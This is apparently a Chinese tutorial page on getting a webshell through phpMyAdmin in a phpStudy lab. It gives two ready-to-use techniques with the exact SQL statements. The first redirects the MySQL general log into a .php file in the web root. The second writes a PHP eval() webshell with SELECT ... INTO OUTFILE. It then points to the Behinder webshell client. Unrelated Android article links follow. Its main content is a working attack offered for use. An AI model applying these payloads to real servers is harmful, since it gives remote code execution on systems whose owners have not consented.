常见cms漏洞之PhPMyadmin

环境phpstudy

安装后直接访问即可密码为mysql的密码,在小皮中即可查看

通过日志文件拿Shell

利用mysql日志文件写shel,这个日志可以在mysql里改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取一个webshell。

把值修改为on,以及www下的php文件

然后去select语句

复制代码
select "<?php phpinfo();eval($_POST['cmd']);?>"

导入导出拿WebShell

1.首先判断mysql位置

复制代码
select @@datadir

2.猜测web路径猜测web路径扩展的同级目录下存在www目录

复制代码
C:\phpstudy_pro\WWW\222.php

3.写入webshell

复制代码
select  "<?php phpinfo();@eval($_POST[cmd]);" into outfile "C:/phpstudy_pro/WWW/222.php"

对webshell使用冰蝎吧!

相关推荐
城东米粉儿6 分钟前
Android VSync 笔记
android
城东米粉儿8 分钟前
Android SurfaceFlinger 笔记
android
似霰16 分钟前
Android 日志系统5——logd 写日志过程分析二
android·log
hewence128 分钟前
Kotlin CoroutineContext 详解
android·开发语言·kotlin
Albert Edison1 小时前
【Python】文件
android·服务器·python
大模型玩家七七1 小时前
效果评估:如何判断一个祝福 AI 是否“走心”
android·java·开发语言·网络·人工智能·batch
Aurora4191 小时前
Android事件分发逻辑--针对事件分发相关函数的讲解
android
似霰2 小时前
Android 日志系统4——logd 写日志过程分析一
android
youyoulg3 小时前
利用Android Studio编译Android上可直接执行的二进制
android·ide·android studio